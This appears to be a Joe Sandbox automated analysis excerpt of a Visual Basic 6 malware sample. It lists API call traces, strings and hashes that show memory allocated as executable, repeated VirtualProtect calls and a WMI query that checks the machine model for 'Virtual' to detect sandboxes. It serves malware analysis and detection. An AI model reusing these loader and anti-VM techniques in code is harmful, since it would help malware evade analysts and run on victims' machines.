#644.MSVBVM60(005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD8FD
__vbaStrCat.MSVBVM60(0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD90F
__vbaStrMove.MSVBVM60(0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD919
__vbaStrCat.MSVBVM60(0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD924
#638.MSVBVM60(?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD936
__vbaFreeStr.MSVBVM60(00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD94D
__vbaFreeVar.MSVBVM60(00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD955
__vbaAryLock.MSVBVM60(?,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000), ref: 004FD97A
#644.MSVBVM60(?,?,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?), ref: 004FD98F
__vbaAryUnlock.MSVBVM60(?,?,?,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?), ref: 004FD99B
#644.MSVBVM60(00000040,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000), ref: 004FD9C6
#644.MSVBVM60(0C2474FF,00000000,00401002,00000040,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?), ref: 004FD9E6
#644.MSVBVM60(0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002,00000040,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?), ref: 004FDA06
#644.MSVBVM60(10244C8B,00000000,00400FFA,0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002,00000040,00000040,-0050321C,?,0040BFDC,00000000,0040BE84), ref: 004FDA26
#644.MSVBVM60(2CC20189,00000000,00400FF6,10244C8B,00000000,00400FFA,0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002,00000040,00000040,-0050321C,?), ref: 004FDA42
#644.MSVBVM60(?,00000000,00400FF2,2CC20189,00000000,00400FF6,10244C8B,00000000,00400FFA,0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002,00000040), ref: 004FDA6C
#644.MSVBVM60(?,?,00000000,00400FF2,2CC20189,00000000,00400FF6,10244C8B,00000000,00400FFA,0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002), ref: 004FDA78
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BD6C,00000020,?,?,?,?,?,00000000,?), ref: 004FDAB3
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,00000000,?), ref: 004FDAD7
#644.MSVBVM60(?,?,?,?,?,?,?,00000000,?), ref: 004FDAEB
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,00000000,?), ref: 004FDAF7
#644.MSVBVM60(?,?,?,?,?,?,00000000,?), ref: 004FDB14
__vbaAryDestruct.MSVBVM60(00000000,?,004FDB62,00000000,00401006,?,?,?,?,?,?,00000000,?), ref: 004FDB54
__vbaFreeObj.MSVBVM60(00000000,?,004FDB62,00000000,00401006,?,?,?,?,?,?,00000000,?), ref: 004FDB5C

Strings

0#P, xrefs: 004FD692
@, xrefs: 004FD85D

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$#644$Free$LockUnlock$AddrefCheckHresultMove$#638CastDestructProtectRedimVirtual
String ID: 0#P$@
API String ID: 3983459261-1041023437
Opcode ID: e50784fa3a6fd6a427e6abdc73a454a512dbe0d9856517324edcd74bed24c3d3
Instruction ID: f0eb4e79f683e12d67832882fb04396479c4377e2849d027f13eeb184f72f7f6
Opcode Fuzzy Hash: e50784fa3a6fd6a427e6abdc73a454a512dbe0d9856517324edcd74bed24c3d3
Instruction Fuzzy Hash: 8EE1E9B5D00219ABCF14EFE5CC45DDEBBBDEF09704B10452AF601BB2A2DA789905CB64

Function 004FDCA4 Relevance: 100.2, APIs: 55, Strings: 2, Instructions: 412
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,0000000F,00000000,?,?,?), ref: 004FDD08
__vbaNew.MSVBVM60(0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD1A
__vbaObjSet.MSVBVM60(?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD24
__vbaCastObj.MSVBVM60(00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD2A
__vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD34
__vbaObjSetAddref.MSVBVM60(005032AC,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD43
__vbaFreeObjList.MSVBVM60(00000002,?,?,005032AC,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FDD52
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD66
#644.MSVBVM60(00000000,?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD6C
__vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD77
__vbaAryLock.MSVBVM60(004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDA8
#644.MSVBVM60(B445C7BC,004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDBD
__vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDC9
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDF4
#644.MSVBVM60(00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDFA
__vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDE04
#644.MSVBVM60(00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDE0D
__vbaAryLock.MSVBVM60(004FA910,00000000,00000000,00000000,00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C), ref: 004FDE20
#644.MSVBVM60(B445C7BC,004FA910,00000000,00000000,00000000,00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000), ref: 004FDE34
__vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,00000000,00000000,00000000,00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000), ref: 004FDE40
#644.MSVBVM60(?,004FA910,B445C7BC,004FA910,00000000,00000000,00000000,00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?), ref: 004FDE4F
__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,00000010,00000000,00000000,00000000,?,004FA910,B445C7BC,004FA910,00000000,00000000,00000000), ref: 004FDE7E
#644.MSVBVM60(-00000004,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDE8A
#644.MSVBVM60(?,?,00000000,-00000004,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDEA7
__vbaAryLock.MSVBVM60(004FA910,?,00000000,?,?,?,00000000,-00000004,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000), ref: 004FDEC6
__vbaStrCat.MSVBVM60(0040BCF8,0040BCF0,B445C7BC,00000040,004FA910,?,00000000,?,?,?,00000000,-00000004,00000000,00000000,00000008,00000008), ref: 004FDEF2
__vbaStrMove.MSVBVM60(0040BCF8,0040BCF0,B445C7BC,00000040,004FA910,?,00000000,?,?,?,00000000,-00000004,00000000,00000000,00000008,00000008), ref: 004FDEFC
__vbaI4Str.MSVBVM60(00000000,0040BCF8,0040BCF0,B445C7BC,00000040,004FA910,?,00000000,?,?,?,00000000,-00000004,00000000,00000000,00000008), ref: 004FDF02
VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040BCF8,0040BCF0,B445C7BC,00000040,004FA910,?,00000000,?,?,?,00000000,-00000004,00000000), ref: 004FDF10
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BD6C,0000002C,?,?,?,?,?,?,?), ref: 004FDF2A
__vbaAryUnlock.MSVBVM60(004FA910,?,?,?,?,?,?,?), ref: 004FDF33
__vbaFreeStr.MSVBVM60(004FA910,?,?,?,?,?,?,?), ref: 004FDF3B
#644.MSVBVM60(-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF44
__vbaStrCat.MSVBVM60(0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF56
__vbaStrMove.MSVBVM60(0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF60
__vbaStrCat.MSVBVM60(0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF6B
#638.MSVBVM60(?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF7E
__vbaFreeStr.MSVBVM60(00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF92
__vbaFreeVar.MSVBVM60(00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF9A
__vbaAryLock.MSVBVM60(004FA910,?,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FDFB9
#644.MSVBVM60(B445C7BC,004FA910,?,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FDFCE
__vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,?,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FDFDA
#644.MSVBVM60(00000040,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FE002
#644.MSVBVM60(0424448B,00000004,00000000,00000004,00000040,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FE021
#644.MSVBVM60(408B008B,00000008,00000000,00000004,0424448B,00000004,00000000,00000004,00000040,?,00000040,?,?,0040BFDC,00000000,0040BE84), ref: 004FE040
#644.MSVBVM60(20C4832C,0000000C,00000000,00000004,408B008B,00000008,00000000,00000004,0424448B,00000004,00000000,00000004,00000040,?,00000040,?), ref: 004FE05F
#644.MSVBVM60(E02474FF,00000010,00000000,00000004,20C4832C,0000000C,00000000,00000004,408B008B,00000008,00000000,00000004,0424448B,00000004,00000000,00000004), ref: 004FE07E
VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000014,00000000,00000004,E02474FF,00000010), ref: 004FE0C2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BD6C,00000020,?,?,?,?,?,?,?), ref: 004FE0DC
__vbaAryLock.MSVBVM60(004FA910,?,?,?,?,?,?,?,?,?), ref: 004FE0F7
#644.MSVBVM60(B445C7BC,004FA910,?,?,?,?,?,?,?,?,?), ref: 004FE10B
__vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,?,?,?,?,?,?,?,?,?), ref: 004FE117
#644.MSVBVM60(00000004,?,?,?,?,?,?,?,?), ref: 004FE134
__vbaAryDestruct.MSVBVM60(00000000,00000000,004FE18D,00000000,00000000,00000004,?,?,?,?,?,?,?,?), ref: 004FE17D
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,00000000,004FE18D,00000000,00000000,00000004,?,?,?,?,?,?,?,?), ref: 004FE187

Strings

P#P, xrefs: 004FDCC5
@, xrefs: 004FDE9F

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$#644$Free$LockUnlock$Addref$CheckDestructHresultMoveProtectRedimVirtual$#638CastList
String ID: @$P#P
API String ID: 22558003-150970136
Opcode ID: b14baa83287f729ac0bef4a09b83980f4760d7391e248bdb05709bd8091a2ead
Instruction ID: 7c2a6812e5be39e45aad52766f83e2d24fcbde20faffd0501096b073d3e6497d
Opcode Fuzzy Hash: b14baa83287f729ac0bef4a09b83980f4760d7391e248bdb05709bd8091a2ead
Instruction Fuzzy Hash: 03E1CBB1D00219ABCB14EFE5CD85DDEBBBDEF08704F10452AF601BB2A6D6799904CB64

Function 004FC4F4 Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaVarDup.MSVBVM60 ref: 004FC578
#626.MSVBVM60(?,?,0000000A), ref: 004FC589
__vbaVarZero.MSVBVM60(?,?,0000000A), ref: 004FC597
__vbaFreeVarList.MSVBVM60(00000002,?,0000000A,?,?,0000000A), ref: 004FC5A6
__vbaVarLateMemCallLd.MSVBVM60(?,?,ExecQuery,00000001,?,00000002,?,0000000A,?,?,0000000A), ref: 004FC5D3
__vbaVarZero.MSVBVM60(?,?,?,?,0000000A), ref: 004FC5E3
__vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC60F
__vbaVarLateMemCallLd.MSVBVM60(?,?,Model,00000000,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC626
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,0000000A), ref: 004FC633
__vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC658
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC679
#633.MSVBVM60(?,?,?,0000000A,00000001,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC699
#635.MSVBVM60(?,?,?,?,0000000A,00000001,?,?,?,?,?,?,?,?,?,?), ref: 004FC6A2
__vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?,?,?,?,?,0000000A,00000001,?,?,?,?,?,?), ref: 004FC6B8
__vbaAryUnlock.MSVBVM60(?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC6E5
__vbaFreeObj.MSVBVM60(?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC6F0
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC705
__vbaFreeVar.MSVBVM60(?,?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC710
__vbaFreeVar.MSVBVM60(?,?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC718

Strings

Model, xrefs: 004FC61C
"P, xrefs: 004FC518
Virtual, xrefs: 004FC668
Select * from Win32_ComputerSystem, xrefs: 004FC5B4
winmgmts:\\.\root\cimv2, xrefs: 004FC56E
ExecQuery, xrefs: 004FC5C9

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$List$CallEachLateZero$#626#633#635MoveNextUnlock
String ID: ExecQuery$Model$Select * from Win32_ComputerSystem$Virtual$winmgmts:\\.\root\cimv2$"P
API String ID: 1937198248-455726391
Opcode ID: 05a183285e00056742a97b2277e8207855d09def9f1ac3c529a5fd331c141f11
Instruction ID: be2067835e52feb06568d63d961a0afe91277575c7399f656b16464723e55622
Opcode Fuzzy Hash: 05a183285e00056742a97b2277e8207855d09def9f1ac3c529a5fd331c141f11
Instruction Fuzzy Hash: 8651B6B2D0025CAADB11DFD1CD81BDEB7BCAB08304F50416BA249B7151EB786B498FA5

Function 004FBEF5 Relevance: 37.7, APIs: 25, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaVarAdd.MSVBVM60(?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBF9E
__vbaVarSub.MSVBVM60(?,00000000,00000000,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBFAF
__vbaI4Var.MSVBVM60(00000000,?,00000000,00000000,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBFB5
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,00000000,00000000,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBFC6
__vbaAryLock.MSVBVM60(?,?,0040BEAC,?,00000000), ref: 004FBFD9
#644.MSVBVM60(?,?,?,0040BEAC,?,00000000), ref: 004FBFE8
__vbaAryUnlock.MSVBVM60(?,?,?,?,0040BEAC,?,00000000), ref: 004FBFF3
#644.MSVBVM60(?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBFFC
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,00000000,?,?,?,?,?,0040BEAC,?), ref: 004FC01D
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FC02B
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FC037
__vbaSetSystemError.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC,?), ref: 004FC06A
__vbaAryUnlock.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC), ref: 004FC073
__vbaAryUnlock.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC07C
__vbaVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC097
__vbaVarTstEq.MSVBVM60(00008003,?,?,?,00000002,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC0BA
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00008003,?,?,?,00000002,?,?,?,?), ref: 004FC0D5
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FC0E3

Part of subcall function 004FBE71: __vbaRefVarAry.MSVBVM60(0040BEAC), ref: 004FBEA4
Part of subcall function 004FBE71: __vbaUbound.MSVBVM60(00000001,00000000,0040BEAC), ref: 004FBEAD
Part of subcall function 004FBE71: __vbaVarMove.MSVBVM60(00000001,00000000,0040BEAC), ref: 004FBEC2

#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC,?), ref: 004FC0F2
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC), ref: 004FC0FD
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC109
#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC118
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC123
__vbaFreeVar.MSVBVM60(004FC17A,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC169
__vbaAryDestruct.MSVBVM60(00000000,?,004FC17A,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC174

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$LockUnlock$#644$FreeMoveRedim$DestructErrorListSystemUbound
String ID:
API String ID: 1744996622-0
Opcode ID: 7b24046384911871ff618d902ffa382674d29ff28c5a3c6680b3cdabe8fa6b2d
Instruction ID: e63446d4fd8382a4310cd27e240cc6aec999c6504e2c885f817e8de42f298fd5
Opcode Fuzzy Hash: 7b24046384911871ff618d902ffa382674d29ff28c5a3c6680b3cdabe8fa6b2d
Instruction Fuzzy Hash: C771B7B1D0020CAEDB15EFE5D985EDEBBBCAF08314F10416AF214B7251DA799A448F64

Function 004FB0FC Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#644.MSVBVM60(?,004EBCC9), ref: 004FB150
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000004,?,004EBCC9), ref: 004FB171
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,?,00003000,00000040,00000000,00000000,00000004,?,004EBCC9), ref: 004FB18D
__vbaAryLock.MSVBVM60(?,?,00000000,00000004,?,004EBCC9), ref: 004FB19C
#644.MSVBVM60(?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1AB
__vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1B6
__vbaAryLock.MSVBVM60(?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1D7
#644.MSVBVM60(?,?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1E6
__vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1F1

Part of subcall function 004FB051: __vbaVarVargNofree.MSVBVM60 ref: 004FB08E
Part of subcall function 004FB051: __vbaStrVarVal.MSVBVM60(?,00000000), ref: 004FB098
Part of subcall function 004FB051: #644.MSVBVM60(00000000,?,00000000), ref: 004FB09E
Part of subcall function 004FB051: __vbaVarMove.MSVBVM60(00000000,?,00000000), ref: 004FB0B3
Part of subcall function 004FB051: __vbaFreeStr.MSVBVM60(00000000,?,00000000), ref: 004FB0BB

__vbaAryLock.MSVBVM60(?,00000000,?,00401006,00000000,00000000,?,?,?,?,?,00000000,-00000004,?,?,?), ref: 004FB216
#644.MSVBVM60(?,?,00000000,?,00401006,00000000,00000000,?,?,?,?,?,00000000,-00000004,?,?), ref: 004FB225
__vbaAryUnlock.MSVBVM60(?,?,?,00000000,?,00401006,00000000,00000000,?,?,?,?,?,00000000,-00000004,?), ref: 004FB230
__vbaI4Var.MSVBVM60(?,00000000,00000000,00000000,?,?,?,00000000,?,00401006,00000000,00000000,?,?,?,?), ref: 004FB241
__vbaVarMove.MSVBVM60(00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000,?,00401006,00000000,00000000,?,?), ref: 004FB25D
__vbaFreeVar.MSVBVM60(00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000,?,00401006,00000000,00000000,?,?), ref: 004FB265
__vbaAryDestruct.MSVBVM60(00000000,?,004FB29D,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000,?,00401006,00000000), ref: 004FB297

Strings

p"P, xrefs: 004FB11E

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$#644$LockUnlock$FreeMove$AllocDestructNofreeRedimVargVirtual
String ID: p"P
API String ID: 606970595-1734977174
Opcode ID: 49ee44f795c8b9655eb9aed4a59bf10f49523497192878aab4157e4e156cbb79
Instruction ID: 029fdda2a3628f635598b8773345b9e9cb9a12365a9098b4897ffc895b0cbcc3
Opcode Fuzzy Hash: 49ee44f795c8b9655eb9aed4a59bf10f49523497192878aab4157e4e156cbb79
Instruction Fuzzy Hash: B6414F71901208AFCB04EBE5CD46E9EBBBDEF09704F10412AF600BB291DB799A05CB94

Function 004FA88C Relevance: 28.7, APIs: 19, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#644.MSVBVM60 ref: 004FA8CE
#644.MSVBVM60(-00000004,00000000), ref: 004FA8E8
#644.MSVBVM60(?,00000000,-00000004,-00000004,00000000), ref: 004FA901

Part of subcall function 004FDCA4: __vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,0000000F,00000000,?,?,?), ref: 004FDD08
Part of subcall function 004FDCA4: __vbaNew.MSVBVM60(0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD1A
Part of subcall function 004FDCA4: __vbaObjSet.MSVBVM60(?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD24
Part of subcall function 004FDCA4: __vbaCastObj.MSVBVM60(00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD2A
Part of subcall function 004FDCA4: __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD34
Part of subcall function 004FDCA4: __vbaObjSetAddref.MSVBVM60(005032AC,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD43
Part of subcall function 004FDCA4: __vbaFreeObjList.MSVBVM60(00000002,?,?,005032AC,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FDD52
